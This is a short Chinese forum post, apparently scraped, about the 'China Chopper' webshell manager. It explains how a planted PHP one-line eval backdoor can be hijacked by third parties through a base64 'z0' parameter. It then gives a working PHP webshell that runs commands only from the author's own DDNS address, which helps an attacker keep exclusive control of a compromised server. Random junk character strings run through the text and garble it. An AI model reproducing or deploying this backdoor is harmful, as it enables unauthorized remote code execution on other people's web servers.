今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞+ |9 |# n H& B( b
, [, D9 M- P# l7 C5 n: L. ?
就算你设置了密码,使用了eval($_REQUEST['moyo']);
- E9 [/ S7 P% g% S+ J7 U* }1 `6 D2 n
- u5 L7 t) X' D4 ~) e# o+ Q但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门
* H0 \1 R3 ], z* d9 M( U/ n X( A/ J4 l' Y# G
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));
% o0 [" Z1 U2 L3 u+ r+ [) X2 [3 e
, K+ L' x* u5 C9 c. z: }直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了1 a' J! @! E( }+ x5 M
8 L- c' r7 l% o6 J& x& p不知道是设计缺陷还是故意留的后门
2 f8 v p8 O. Q! y% m3 @; p5 n: ~2 W% u" y. D
如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用: b" a, X' V2 H1 M5 @
/ R1 e8 m# k5 r- D# M$ t, W
本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org! H, l4 D7 f" m- C6 B# h8 D
4 f" I; @5 e" U% I
然后一句话后门这样写+ u: H5 p. J, g1 C6 c0 V
3 ]. m* ?* b: }
<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>
4 J$ L2 J" M) T( |; a' a* y5 `这样就可以让一句话后门只允许自己的电脑连接了+ H: R5 }0 r$ g6 r8 u
g. r) M. L) T) z# c( T8 i! F4 T
|